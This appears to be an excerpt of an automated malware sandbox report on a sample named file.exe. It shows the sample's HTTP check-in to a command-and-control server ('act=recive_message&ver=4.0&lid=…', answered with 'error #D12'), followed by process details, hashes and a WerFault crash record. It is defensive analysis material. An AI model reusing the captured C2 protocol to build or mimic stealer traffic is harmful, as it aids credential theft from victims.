                                  2024-10-13 04:54:10 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                  Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                  2024-10-13 04:54:10 UTC831INHTTP/1.1 200 OK
                                  Date: Sun, 13 Oct 2024 04:54:10 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: PHPSESSID=ik8sruja7304d8ee3hst3j0cfa; expires=Wed, 05 Feb 2025 22:40:49 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  cf-cache-status: DYNAMIC
                                  vary: accept-encoding
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJt4YgWbyGfNav2hfhipdclX%2BAhBRPzvmQ%2Ftc3UFYZRvufcgsZqaTuvC1xQeNLQ5%2Ff8f0qhd0iyGnUsHRL%2B37hXCKHjDz82nQaac2qpXAWUJhB9k77y6x28hXXPDnpy%2BSE8MEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8d1cbaeb6b0d4207-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-10-13 04:54:10 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                  Data Ascii: aerror #D12
                                  2024-10-13 04:54:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:00:54:05
                                  Start date:13/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x780000
                                  File size:1'808'384 bytes
                                  MD5 hash:34124E70E2508DE56D89B57345B39F65
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:00:54:09
                                  Start date:13/10/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 1896
                                  Imagebase:0xc30000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  No disassembly